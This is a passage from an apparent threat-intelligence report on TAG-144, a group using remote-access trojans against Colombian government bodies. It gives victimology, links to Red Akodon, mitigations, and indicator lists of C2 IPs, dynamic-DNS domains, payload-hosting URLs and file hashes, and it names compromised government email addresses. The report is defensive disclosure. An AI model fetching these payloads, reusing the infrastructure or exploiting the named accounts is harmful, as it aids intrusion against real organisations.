aee42a6d8d22a421fd445695d8b8c8b3311fa0dc0476461ea649a08236587edd)\r\nNUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_E.rar\r\n(SHA256: 0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1)\r\nVictimology\r\nOverall, Insikt Group identified a significant number of TAG-144 victims, all of which, where attribution was possible, were\r\nColombian entities. Notably, as evidenced by victims associated with Clusters 1 and 2, the majority were directly tied to\r\nColombian government institutions (see Figure 15). Beyond these, additional victims were identified across the healthcare,\r\nretail, transportation, defense, and oil sectors. Importantly, several of these non-governmental entities maintain some degree\r\nof affiliation with the state.\r\nFigure 15: Breakdown of TAG-144 victims observed between May 2024 and July 2025 (Source: Recorded Future)\r\nAlthough TAG-144 has targeted other sectors and has occasionally been linked to intrusions in additional South American\r\ncountries such as Ecuador, as well as Spanish-speaking victims in the US, its primary focus has consistently remained on\r\nColombia, particularly on government entities. This persistent targeting raises questions about the threat group’s true\r\nmotivations, such as whether it operates solely as a financially driven threat actor leveraging established tools, techniques,\r\nand monetization strategies, or whether elements of state-sponsored espionage are also at play.\r\nOverlap with Red Akodon\r\nIn May 2024, SCILabs reported on a threat actor it named Red Akodon, which closely resembled Blind Eagle in terms of\r\nTTPs. The threat actor primarily targeted Colombian government entities using RATs such as REMCOS RAT, QuasarRAT,\r\nAsyncRAT, and XWorm. The attacks were delivered via phishing emails posing as legal notices or judicial summonses,\r\nallegedly sent by Colombian institutions like the Fiscalía General de la Nación and the Juzgado 06 Civil del Circuito de\r\nBogotá. Despite the similarities, SCILabs chose to track Red Akodon as a distinct threat actor at the time of writing.\r\nAmong others, the report identified four GitHub repository usernames: “jairpicc”, “santiagonasar”, “colombo08125”, and\r\n“mastermr02456”. Of note, jairpicc also appeared in association with a Pastebin account observed on August 23, 2024 (see\r\nFigure 16).\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 13 of 34\n\nFigure 16: Pastebin account linked to jairpicc (Source: Recorded Future)\r\nThe Pastebin account was associated with multiple Pastebin links, at least two of which returned Bitbucket URLs hosting\r\nAsyncRAT payloads. These AsyncRAT payloads communicated with domains such as enviasept[.]duckdns[.]org,\r\nenviosep04[.]duckdns[.]org, sost2024ene[.]duckdns[.]org, and trabajo25[.]duckdns[.]org, all linked to TAG-144.\r\nAdditionally, Insikt Group noted that the payloads hosted on these Bitbucket URLs followed file naming conventions\r\nconsistent with those observed in TAG-144 infrastructure. For instance, one Pastebin link returned the URL\r\nhxxps://bitbucket[.]org/descargggt/servdifr/downloads/remcoss[.]txt, with the filename remcoss.txt matching file names\r\nfound in open directories previously reported in association with TAG-144. Additional Bitbucket URLs hosting files with\r\nmatching filenames that lead to AsyncRAT infections are provided in Appendix A.\r\nAdditionally, Red Akodon appears to have used at least two likely compromised email addresses associated with Colombian\r\ngovernment entities: nomina[@]magdalena[.]gov[.]co and npereza[@]cendoj[.]ramajudicial[.]gov[.]co. Notably, on\r\nOctober 31, 2024, the Colombian cybersecurity blog ¡Mucho Hacker! reported on related activity involving similar abuse.\r\nThis report highlighted the use of legitimate government-linked email addresses, including abogados[@]hujmb[.]gov[.]co\r\nand j03mpmixartado[@]cendoj[.]ramajudicial[.]gov[.]co. The blog speculated that the threat actor either had access to\r\ninternal systems, allowing them to create legitimate-looking email accounts, or possessed an undisclosed capability to spoof\r\nofficial addresses.\r\nInsikt Group confirmed that the email address j03mpmixartado[@]cendoj[.]ramajudicial[.]gov[.]co is legitimate and seems\r\nto belong to the Juzgado 003 Penal Municipal con Funciones Mixtas de Chiquinquirá. Furthermore, the address was found\r\nin malware logs associated with the Stealc infostealer, suggesting compromise. The email appears to be linked to a\r\nColombian public official serving as Secretary of the Second Civil Circuit Court in Chiquinquirá.\r\nThe malware logs also contain email addresses believed to be leveraged for phishing purposes, including:\r\nftorreshe[@]cendoj[.]ramajudicial[.]gov[.]co\r\nj01pmpalchiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\nj02cctochiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\njcmpalchoconta[@]cendoj[.]ramajudicial[.]gov[.]co\r\nraccionestutj02cctochiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\nrepchiquinquiraboy[@]cendoj[.]ramajudicial[.]gov[.]co\r\nsilay.salamanca699[@]educacionbogota[.]edu[.]co\r\nInsikt Group assesses that TAG-144 considers the use of compromised government email accounts to deliver spearphishing\r\nemails a standard part of its toolkit and is likely to continue employing this tactic.\r\nMitigations\r\nRecorded Future Threat Intelligence: Recorded Future customers can proactively mitigate threats by\r\noperationalizing data from the Intelligence Cloud. Leverage continuously updated Risk Lists to blocklist IP addresses\r\nassociated with TAG-144, thereby preventing internal communication with known malicious infrastructure.\r\nRecorded Future Detections: Recorded Future provides Sigma, YARA, and Snort rules that can be integrated into\r\nyour SIEM or endpoint detection and response (EDR) tools. These rules detect the presence or execution of malware\r\nfamilies linked to TAG-144 and similar threats.\r\nRecorded Future Network Intelligence: Recorded Future’s Malicious Traffic Analysis (MTA) events help identify\r\nservers engaged in exfiltration activity with known malicious infrastructure. These insights are powered by\r\nproprietary methodologies. Use general MTA event queries for broad monitoring, or targeted queries to focus\r\nspecifically on malware families associated with TAG-144.\r\nRecorded Future Monitoring: Use Recorded Future to detect, flag, and block inbound and outbound traffic\r\ninvolving email addresses or domains that show signs of compromise, such as those appearing in data leaks, malware\r\nlogs, or underground forums.\r\nMonitoring for Potential Network Device-Based Threat Activity: Monitor traffic from the IP addresses listed in\r\nAppendix A, which are associated with potentially compromised devices, including Mikrotik routers, and which\r\nhave been observed communicating with known TAG-144 C2 infrastructure.\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 14 of 34\n\nLIS Flagging and Blocking: Consider blocking the use of specific LIS on your corporate network if not required for\r\nlegitimate purposes. Network defenders must strike a balance between mitigating malicious communication via LIS\r\nand excessively restricting access to services that are allowed or necessary on their network. Previous Insikt Group\r\nreports, such as “Threat Actors Leverage Internet Services to Enhance Data Theft and Weaken Security Defenses,” as\r\nwell as this report on TAG-144, can help inform those decisions.\r\nEmail Traffic Filtering: Implement a robust email filtering system to detect and flag messages containing malicious\r\nattachments or links. Ensure that suspicious emails are quarantined for detailed inspection, reducing the risk of\r\nphishing attacks and credential compromise.\r\nOutlook\r\nInsikt Group has identified five distinct activity clusters linked to TAG-144, active at various points throughout 2024 and\r\n2025. These clusters have primarily targeted Colombian government entities at the local, municipal, and federal levels,\r\nwhile also affecting private sector and non-governmental organizations. Although they share common TTPs such as the use\r\nof open-source or cracked RATs, dynamic domain providers, and LIS for staging, each cluster demonstrates distinct\r\ninfrastructure, malware deployment methods, and operational approaches. TAG-144 has also been linked to Red Akodon and\r\nhas been observed using compromised Colombian government email accounts in spearphishing campaigns.\r\nTAG-144 is part of a growing cybercriminal ecosystem in South America, where rapid digitalization and limited cyber\r\ndefenses have contributed to more cybercrime. Looking ahead, Insikt Group assesses that TAG-144 will likely continue to\r\nfocus on Colombian government targets, while maintaining its current operational patterns. This includes continued use of\r\ncompromised email addresses, dynamic DNS services, abuse of LIS, and deployment of customized tools such as the\r\npreviously observed BlotchyQuasar variant of QuasarRAT. TAG-144 is also expected to adapt by integrating new cracked or\r\nopen-source tools and identifying additional LIS platforms to exploit. Furthermore, the threat group is likely to deepen its\r\ninvolvement in the broader cybercriminal ecosystem through collaboration with tool developers and affiliated threat actors.\r\nGiven its persistent targeting, technical adaptability, and operational success, Insikt Group assesses that TAG-144 will\r\nremain a significant threat to its typical victim profile for the foreseeable future.\r\nAppendix A: Cluster 1 IP Addresses\r\nIP Address ASN Type Malware Families\r\n45[.]133[.]180[.]26 AS9009 TorGuard VPN server AsyncRAT\r\n45[.]133[.]180[.]154 AS9009 TorGuard VPN server AsyncRAT\r\n146[.]70[.]137[.]18 AS9009 TorGuard VPN server AsyncRAT\r\n146[.]70[.]137[.]90 AS9009 TorGuard VPN server DcRAT, AsyncRAT, REMCOS RAT\r\n146[.]70[.]50[.]42 AS9009 TorGuard VPN server AsyncRAT\r\n146[.]70[.]51[.]42 AS9009 TorGuard VPN server DcRAT\r\n146[.]70[.]57[.]58 AS9009 TorGuard VPN server AsyncRAT\r\n146[.]70[.]83[.]218 AS9009 TorGuard VPN server AsyncRAT\r\n181[.]235[.]4[.]255 AS3816 Colombian ISP REMCOS\r\n193[.]56[.]253[.]66 AS9009 TorGuard VPN server REMCOS\r\n93[.]115[.]35[.]146 AS9009 TorGuard VPN server DcRAT\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 15 of 34\n\nAppendix B: Indicators of Compromise (IoCs)\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 16 of 34\n\nCluster 1 IP Addresses:\r\n45[.]133[.]180[.]26\r\n45[.]133[.]180[.]154\r\n93[.]115[.]35[.]146\r\n146[.]70[.]50[.]42\r\n146[.]70[.]51[.]42\r\n146[.]70[.]57[.]58\r\n146[.]70[.]83[.]218\r\n146[.]70[.]137[.]18\r\n146[.]70[.]137[.]90\r\n181[.]235[.]4[.]255\r\n181[.]235[.]10[.]163\r\n181[.]235[.]15[.]197\r\n186[.]169[.]48[.]180\r\n186[.]169[.]50[.]123\r\n186[.]169[.]80[.]199\r\n186[.]169[.]80[.]207\r\n186[.]169[.]82[.]147\r\n186[.]169[.]90[.]53\r\n193[.]56[.]253[.]66\r\nCluster 1 Domains:\r\nalma27[.]duckdns[.]org\r\naseguradotelle[.]duckdns[.]org\r\ndiazpool14[.]duckdns[.]org\r\ndnse2542[.]duckdns[.]org\r\nenvio-18-2[.]duckdns[.]org\r\nenvio01[.]ddns[.]net\r\nenvio02-04[.]duckdns[.]org\r\nenvio05-06[.]duckdns[.]org\r\nenvio07[.]duckdns[.]org\r\nenvio10-04-25[.]duckdns[.]org\r\nenvio1010[.]duckdns[.]org\r\nenvio104[.]duckdns[.]org\r\nenvio11-04[.]duckdns[.]org\r\nenvio14-03[.]duckdns[.]org\r\nenvio14-05[.]duckdns[.]org\r\nenvio1414[.]duckdns[.]org\r\nenvio15-005[.]duckdns[.]org\r\nenvio1515[.]duckdns[.]org\r\nenvio16-05[.]duckdns[.]org\r\nenvio1616[.]duckdns[.]org\r\nenvio19-05[.]duckdns[.]org\r\nenvio19-055[.]duckdns[.]org\r\nenvio1919[.]duckdns[.]org\r\nenvio20-03[.]duckdns[.]org\r\nenvio2020[.]duckdns[.]org\r\nenvio21-005[.]duckdns[.]org\r\nenvio21-05[.]duckdns[.]org\r\nenvio2121[.]duckdns[.]org\r\nenvio2222[.]duckdns[.]org\r\nenvio2333[.]duckdns[.]org\r\nenvio25-03[.]duckdns[.]org\r\nenvio25-04[.]duckdns[.]org\r\nenvio25-3[.]duckdns[.]org\r\nenvio25100255[.]duckdns[.]org\r\nenvio26-005[.]duckdns[.]org\r\nenvio26-03[.]duckdns[.]org\r\nenvio26-05[.]duckdns[.]org\r\nenvio266[.]duckdns[.]org\r\nenvio28-003[.]duckdns[.]org\r\nenvio28[.]duckdns[.]org\r\nenvio29[.]duckdns[.]org\r\nenvio3-04[.]duckdns[.]org\r\nenvio31-03[.]duckdns[.]org\r\nenvio31[.]duckdns[.]org\r\nenvio55[.]duckdns[.]org\r\nenvio6-06[.]duckdns[.]org\r\nenvio666[.]duckdns[.]org\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 17 of 34\n\nenvioo20020[.]duckdns[.]org\r\nhold-asy[.]duckdns[.]org\r\nnewremco[.]duckdns[.]org\r\nojosostenerfebrero[.]duckdns[.]org\r\npooldiaz14[.]duckdns[.]org\r\nqua25q[.]duckdns[.]org\r\nqua25qua[.]duckdns[.]org\r\nrem25rem[.]duckdns[.]org\r\nremc21[.]duckdns[.]org\r\nrespaldito01[.]duckdns[.]org\r\nrespaldito03[.]duckdns[.]org\r\nrespaldomax3[.]duckdns[.]org\r\nrespaldomax4[.]duckdns[.]org\r\nrespaldomx1[.]duckdns[.]org\r\nrespaldomx2[.]duckdns[.]org\r\nrespaldomx5[.]duckdns[.]org\r\nsend9214[.]duckdns[.]org\r\nsendiadad[.]duckdns[.]org\r\ntrabajonuevos[.]duckdns[.]org\r\nusooo205[.]duckdns[.]org\r\nCluster 2 IP Addresses:\r\n45[.]77[.]72[.]102\r\n64[.]188[.]9[.]172\r\n64[.]188[.]9[.]173\r\n64[.]188[.]9[.]175\r\n64[.]188[.]9[.]177\r\n172[.]93[.]160[.]188\r\n177[.]255[.]84[.]173\r\n179[.]14[.]8[.]131\r\n179[.]14[.]11[.]213\r\n181[.]131[.]217[.]63\r\n191[.]88[.]249[.]175\r\n192[.]169[.]69[.]26\r\nCluster 2 Domains:\r\nagilizavacunate202120212021[.]duckdns[.]org\r\nagosagosagostooo20242024[.]duckdns[.]org\r\nandresbermudez3080[.]duckdns[.]org\r\nandresbermudezrespaldok30[.]duckdns[.]org\r\narannsasaaransasaturituri2024[.]duckdns[.]org\r\narmadnocaballerodominio[.]con-ip[.]com\r\narmandocaceres4050[.]con-ip[.]com\r\narmandoferreiro701020dominio[.]con-ip[.]com\r\narmandovillareal5020[.]con-ip[.]com\r\narmandovillareal502011[.]con-ip[.]com\r\nbriana2024[.]kozow[.]com\r\nbriana4000[.]duckdns[.]org\r\nbrianaf511[.]duckdns[.]org\r\ncamanopetro[.]con-ip[.]com\r\ncamarasdeseguridad202420242024[.]duckdns[.]org\r\ncamiloferreiro907010[.]con-ip[.]com\r\ncamiloguerrero5040[.]con-ip[.]com\r\ncanastapatrones[.]con-ip[.]com\r\ncarlosrenteria9050[.]con-ip[.]com\r\ncarmengutierrez9030[.]con-ip[.]com\r\nccerrado10[.]con-ip[.]com\r\ncococovid202420242024[.]duckdns[.]org\r\ncomidafood[.]con-ip[.]com\r\ncopaamerica2022024transmision[.]con-ip[.]com\r\ncristiansantodomingo203010[.]con-ip[.]com\r\ndanielfernandez502010[.]con-ip[.]com\r\ndavidcristiano8070[.]con-ip[.]com\r\ndavidcristiano80702[.]con-ip[.]com\r\ndavidcristiano80703[.]con-ip[.]com\r\ndesdeseptiempresesiente[.]con-ip[.]com\r\ndiciembrearbolitodebelen20222022[.]duckdns[.]org\r\ndmforjadores[.]con-ip[.]com\r\ndominiharrypotter202420242024[.]duckdns[.]org\r\ndominiogeneral20240202402024[.]duckdns[.]org\r\ndominioseternosgraciasadios20230230230[.]duckdns[.]org\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 18 of 34\n\neneroeneroenero2023202311[.]duckdns[.]org\r\nenvioasy24[.]kozow[.]com\r\nfebreroynoesvisiesto20222022[.]duckdns[.]org\r\nfernandocuellar909080[.]con-ip[.]com\r\nfernandoesquivel707020[.]con-ip[.]com\r\nfernandoizquierdo9080[.]con-ip[.]com\r\nfranciscogonzalezdomini[.]con-ip[.]com\r\ngonorreaomegonorrea2021[.]duckdns[.]org\r\nidiotobocaefabmantenio2021[.]duckdns[.]org\r\njaimegonzalez201020[.]con-ip[.]com\r\njuancaf4000[.]duckdns[.]org\r\nlaazcarate202120212021[.]duckdns[.]org\r\nllllllllllllllllllabril26de2021vacunate[.]duckdns[.]org\r\nmarli27[.]duckdns[.]org\r\nmarli27[.]kozow[.]com\r\nmayoelmesdelamosca202422024[.]duckdns[.]org\r\nmayomayomayo202202222022[.]duckdns[.]org\r\nmedicosdelacostasas[.]con-ip[.]com\r\nmetropolispedro16[.]con-ip[.]com\r\nneivanuevasde[.]con-ip[.]com\r\nninosey02[.]con-ip[.]com\r\nnopedro[.]con-ip[.]com\r\nnuevoremremrem20232023[.]duckdns[.]org\r\npasarasaberquecuenta[.]con-ip[.]com\r\npaseoencarro2024[.]con-ip[.]com\r\npasoscon[.]con-ip[.]com\r\npasosconlz[.]con-ip[.]com\r\npasticosmemos[.]con-ip[.]com\r\npenoncaminosdel[.]con-ip[.]com\r\npesosdepesoslibras[.]duckdns[.]org\r\npr1275995[.]con-ip[.]com\r\nmono2024[.]kozow[.]com\r\nprogramahumanitaria202220222022[.]duckdns[.]org\r\npruebadenuevonuevo202024202024[.]duckdns[.]org\r\nqjunioo2024020242024infinito[.]duckdns[.]org\r\nramiromartinelli909070[.]con-ip[.]com\r\nremixripiolo[.]con-ip[.]com\r\nremremrem2021marzo2021[.]duckdns[.]org\r\nrodrigobermudez9080[.]con-ip[.]com\r\nsebastianguerrero5040[.]con-ip[.]com\r\nsebastiansagbini907060[.]con-ip[.]com\r\nsemetiooctubre2022202220222022[.]duckdns[.]org\r\nsuperabrilabrilabril20242024[.]con-ip[.]com\r\nsyscsycsyc20212021[.]duckdns[.]org\r\ntercepico202120212021[.]duckdns[.]org\r\nmayomayomayo202202222022[.]duckdns[.]org\r\nprogramahumanitaria202220222022[.]duckdns[.]org\r\nCluster 2 “deadpoolstart”-Themed Domains:\r\ndeadpoolstart2024[.]con-ip[.]com\r\ndeadpoolstart2025[.]con-ip[.]com\r\ndeadpoolstart2025[.]duckdns[.]org\r\ndeadpoolstart2026[.]con-ip[.]com\r\ndeadpoolstart2026[.]duckdns[.]org\r\ndeadpoolstart2027[.]con-ip[.]com\r\ndeadpoolstart2027[.]duckdns[.]org\r\ndeadpoolstart2028[.]con-ip[.]com\r\ndeadpoolstart2028[.]duckdns[.]org\r\ndeadpoolstart2029[.]con-ip[.]com\r\ndeadpoolstart2029[.]duckdns[.]org\r\ndeadpoolstart2030[.]con-ip[.]com\r\ndeadpoolstart2030[.]duckdns[.]org\r\ndeadpoolstart2033[.]duckdns[.]org\r\ndeadpoolstart2034[.]duckdns[.]org\r\ndeadpoolstart2035[.]duckdns[.]org\r\ndeadpoolstart2036[.]duckdns[.]org\r\ndeadpoolstart2037[.]duckdns[.]org\r\ndeadpoolstart2038[.]duckdns[.]org\r\ndeadpoolstart2041[.]duckdns[.]org\r\ndeadpoolstart2044[.]duckdns[.]org\r\ndeadpoolstart2049[.]duckdns[.]org\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 19 of 34\n\ndeadpoolstart2051[.]duckdns[.]org\r\ndeadpoolstart2052[.]duckdns[.]org\r\ndeadpoolstart2053[.]duckdns[.]org\r\ndeadpoolstart2054[.]duckdns[.]org\r\ndeadpoolstart2059[.]duckdns[.]org\r\ndeadpoolstart2060[.]duckdns[.]org\r\ndeadpoolstart2061[.]duckdns[.]org\r\ndeadpoolstart2063[.]duckdns[.]org\r\ndeadpoolstart2064[.]duckdns[.]org\r\ndeadpoolstart2065[.]duckdns[.]org\r\nCluster 3 IP Addresses:\r\n181[.]131[.]216[.]206\r\n181[.]131[.]218[.]182\r\n181[.]131[.]219[.]42\r\nCluster 3 Domains:\r\nandersondavid4070[.]duckdns[.]org\r\nandersondesousa9030[.]con-ip[.]com\r\nandresguerrero90808[.]con-ip[.]com\r\nandresrestrepo901020[.]duckdns[.]org\r\nandressinisterra508070[.]duckdns[.]org\r\nandresvalderrama4070[.]duckdns[.]org\r\nantonioguerrero4050[.]duckdns[.]org\r\narmandocaceres4050[.]con-ip[.]com\r\narmandoquiroz7020[.]duckdns[.]org\r\narmandosandoval70501023[.]duckdns[.]org\r\narmandovillareal504010[.]duckdns[.]org\r\ncamiloferreiro907010[.]con-ip[.]com\r\ncamiloguerrero5040[.]con-ip[.]com\r\ncarloscaicedo4050202[.]duckdns[.]org\r\ncarlosfernandez401020[.]duckdns[.]org\r\ncarlosmendoza504070[.]duckdns[.]org\r\ncarlosrenteria9050[.]con-ip[.]com\r\ncarlossantrich9080[.]duckdns[.]org\r\ncarlosurrutia805020[.]duckdns[.]org\r\ncarlosurrutia8050202[.]duckdns[.]org\r\ncarlosvillalba9040[.]duckdns[.]org\r\ncarmengutierrez9030[.]con-ip[.]com\r\ncarmenzavillareal4080[.]duckdns[.]org\r\ndavidcristiano8070[.]con-ip[.]com\r\ndavidcristiano80702[.]con-ip[.]com\r\ndavidcristiano80703[.]con-ip[.]com\r\nedgardocarrascal904050[.]duckdns[.]org\r\nfernandocaballero50702[.]duckdns[.]org\r\nfernandogonzalez809010[.]duckdns[.]org\r\nfernandoizquierdo9080[.]con-ip[.]com\r\nfernandolopez105040[.]duckdns[.]org\r\nfranciscodaza3090[.]duckdns[.]org\r\ngermancastillo9050[.]duckdns[.]org\r\njaimegonzalez201020[.]con-ip[.]com\r\njaviersandoval9030[.]duckdns[.]org\r\nmiguelurrutia7040[.]duckdns[.]org\r\nrodrigobermudez9080[.]con-ip[.]com\r\nsandraverdecia708091[.]duckdns[.]org\r\nsantiagovenecia7050[.]duckdns[.]org\r\nsantiagovenecia70502[.]duckdns[.]org\r\nsantiagovillareal101010[.]duckdns[.]org\r\nsebastiancorrea905040[.]duckdns[.]org\r\nsebastianguerrero5040[.]con-ip[.]com\r\nsebastiansagbini907060[.]con-ip[.]com\r\nsergiovalderrama2040[.]duckdns[.]org\r\ntrinidadtobago5020[.]duckdns[.]org\r\nvelisariosantiago7080[.]duckdns[.]org\r\nCluster 4 IP Addresses:\r\n45[.]135[.]232[.]38\r\n46[.]246[.]82[.]9\r\n89[.]117[.]23[.]25\r\n178[.]73[.]218[.]8\r\n181[.]235[.]3[.]0\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 20 of 34\n\n191[.]93[.]113[.]151\r\nCluster 4 Domains:\r\naets[.]duckdns[.]org\r\nasxyz[.]duckdns[.]org\r\nasyfas[.]duckdns[.]org\r\nasygo[.]duckdns[.]org\r\nasynpro[.]duckdns[.]org\r\ncamabinga1[.]duckdns[.]org\r\ndcfast[.]duckdns[.]org\r\ndcglos[.]duckdns[.]org\r\ndckazts[.]duckdns[.]org\r\ndcmxz[.]duckdns[.]org\r\ndcuxpag[.]duckdns[.]org\r\ndrgost[.]duckdns[.]org\r\ndrpras[.]duckdns[.]org\r\ndxpam[.]duckdns[.]org\r\nenviasept[.]duckdns[.]org\r\nenviosep04[.]duckdns[.]org\r\nkeepz[.]duckdns[.]org\r\nojososteneragosto[.]duckdns[.]org\r\nqfast[.]duckdns[.]org\r\nrfwr[.]duckdns[.]org\r\nrosks[.]duckdns[.]org\r\nrxsas[.]duckdns[.]org\r\nsost10[.]duckdns[.]org\r\nsost2024ene[.]duckdns[.]org\r\nsostenerdcrat[.]duckdns[.]org\r\nsostenermio2024[.]duckdns[.]org\r\nsostenermio2025[.]duckdns[.]org\r\nsostenerstartup[.]duckdns[.]org\r\ntestedark[.]writesthisblog[.]com\r\nCluster 5 IP Addresses:\r\n45[.]133[.]180[.]162\r\n46[.]246[.]4[.]3\r\n46[.]246[.]4[.]9\r\n46[.]246[.]4[.]17\r\n46[.]246[.]4[.]19\r\n46[.]246[.]6[.]4\r\n46[.]246[.]6[.]5\r\n46[.]246[.]6[.]13\r\n46[.]246[.]6[.]20\r\n46[.]246[.]12[.]2\r\n46[.]246[.]12[.]3\r\n46[.]246[.]14[.]2\r\n46[.]246[.]14[.]4\r\n46[.]246[.]14[.]5\r\n46[.]246[.]14[.]7\r\n46[.]246[.]14[.]15\r\n46[.]246[.]14[.]17\r\n46[.]246[.]14[.]21\r\n46[.]246[.]80[.]3\r\n46[.]246[.]80[.]16\r\n46[.]246[.]82[.]9\r\n46[.]246[.]82[.]11\r\n46[.]246[.]82[.]12\r\n46[.]246[.]82[.]16\r\n46[.]246[.]82[.]17\r\n46[.]246[.]82[.]18\r\n46[.]246[.]82[.]19\r\n46[.]246[.]84[.]5\r\n46[.]246[.]84[.]7\r\n46[.]246[.]84[.]10\r\n46[.]246[.]84[.]15\r\n46[.]246[.]84[.]18\r\n46[.]246[.]86[.]4\r\n46[.]246[.]86[.]5\r\n46[.]246[.]86[.]16\r\n46[.]246[.]86[.]18\r\n178[.]73[.]192[.]3\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 21 of 34\n\n178[.]73[.]192[.]8\r\n178[.]73[.]192[.]12\r\n178[.]73[.]192[.]18\r\n178[.]73[.]218[.]2\r\n178[.]73[.]218[.]7\r\n178[.]73[.]218[.]12\r\n178[.]73[.]218[.]13\r\n178[.]73[.]218[.]17\r\n188[.]126[.]90[.]2\r\n188[.]126[.]90[.]4\r\n188[.]126[.]90[.]9\r\n188[.]126[.]90[.]15\r\n188[.]126[.]90[.]20\r\nCluster 5 Domains:\r\n2seguro2025[.]duckdns[.]org\r\nansy10jun[.]duckdns[.]org\r\nansy1703[.]duckdns[.]org\r\nasegurar2octubre[.]duckdns[.]org\r\nasegurar3octubre[.]duckdns[.]org\r\nbb2023[.]duckdns[.]org\r\ndcabril[.]duckdns[.]org\r\ngotemburgoxm[.]duckdns[.]org\r\nromanovas[.]duckdns[.]org\r\nURLs:\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_e1502b7358874d6086b38a71038423c2[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_fb2497d842454850a250bf600d899709[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_175c782b52a345e9b408a8449e64f766[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_4ca2665d006b45ec95526f844b1bb6f7[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_7d71280008c9462aa54e84600eb9ee6d[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_827908fb62d34a0b988508c8e9333b4a[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_a5260fdbc31b44af9df4b09d3f369843[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_ad30f08ca19f483ba511f63ef3d15dd3[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_b476d1da5ee74acb9f4973c91df6852b[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_c9ad47e108e64053a72ec0b686a39a96[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_caf7a77031444a62880f2392b32c04d7[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_d8bd099bf2e64e0bbf252e7b31459507[.]txt\r\nhxxp[://]deadpoolstart[.]lovestoblog[.]com/arquivo_ddca1f50d908428fa2aba69de178a2ae[.]txt\r\nSHA256 Hashes:\r\n0242cb2f175959083d6e335291a6010810adea229262638b4c4519b73a0235e1\r\n02c4dc743727fc80a96de9949ff6c70311359681e04ae569a8416e235025de62\r\n04878a5889e3368c2cf093d42006ba18a87c5054f1464900094e6864f4919899\r\n05869e6f626ef7a1638b89d0b95fc5c74f8dd4e794da18170f9fab3c5837f97f\r\n0648201ff2ff9fd17389046da374d2df92bab623e52016c2502604a1c9acab60\r\n068a73b181fb2018e45d5740d84c4951aab9208efe3dc2affc4be9a98e30a36d\r\n0729eb04a031abe19ff9a06cc85f5d634fb519cc1c4572552cda2279fd41598d\r\n08f5d691d0bda5a166789bc7544258713752fb2d0349a3440fde1e2754cb1511\r\n09906220a031d47b63209142dae794c1823d413450641d06a96086e80487d648\r\n0a81caad21e4cba59297617001902807e5ec3f97bf0eb7061da9e473aaa73cf6\r\n0af4ff2ba05c033fc79f75d349aa4219e311f9dbbb7b1c6b653c0b7f196b4ae3\r\n0b80cf85d6c8ac7ef2c3f133db86ff11eb0f3e94d579d40c70c1f8a26e395af3\r\n0b8d9cf2c5e7185b13d65c3d442800005ba741cc03fa7ba09c969b63855ad851\r\n0bb560a3de9032a34f50ffaf900d69a060ff858295fca93f2e00c99de4f5317f\r\n0bd12552db5235ed9ee92a1c8bd4779070cef15a4dc8992bc06cfcec81cd9e7d\r\n0c0e3db172d6bebd207ef644014b3189fc4743a8ae82326e662218ad041926fd\r\n0e0195998fe478bbfc06a28706f21ae830f15765995cad680b955baf23eb9b86\r\n0e5a768a611a4d0ed7cb984b2ee790ad419c6ce0be68c341a2d4f64c531d8122\r\n0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1\r\n1039d25f6a62b5d00c636bd77bf72058bc20ef21f4ca41c38ae6fe404b2d5359\r\n117d0c3fed7afe29a633ef9ae9a7ce91b07d42f0dfee74623339f55d539ccfe9\r\n1226a8d066328a8b6f353c9d98f1dc8128bd84f3909ae1cc6811dc1adff33c81\r\n1311b0d5a434cd5eea9622e4eb01de6546cb147f70807c15f95070c565147837\r\n13e9e508c4a67f7c026a0c3edcd604a445d66454044c5d74ba2e4f31fa26c0a5\r\n14bf934d99de4db93cdf536ef2ab1e5b8e5a0c0eed98a25904672de5d110059e\r\n15083899111221e370e7c2f45b19f23fd88ca40d3f1c2c6d19324fd6414c609e\r\n1d26170ba16131f0321cf65e19a0ce4acfc7d5dc7cb8b020431019eaf5f888e8\r\n1da1eabae5779e22e59d82a7f46e4b940aff525a33254624de9ee320ac54dd99\r\n1e850dc9786d670c97ed064b1af87aab966be58d80051476918b0183b0069b3a\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 22 of 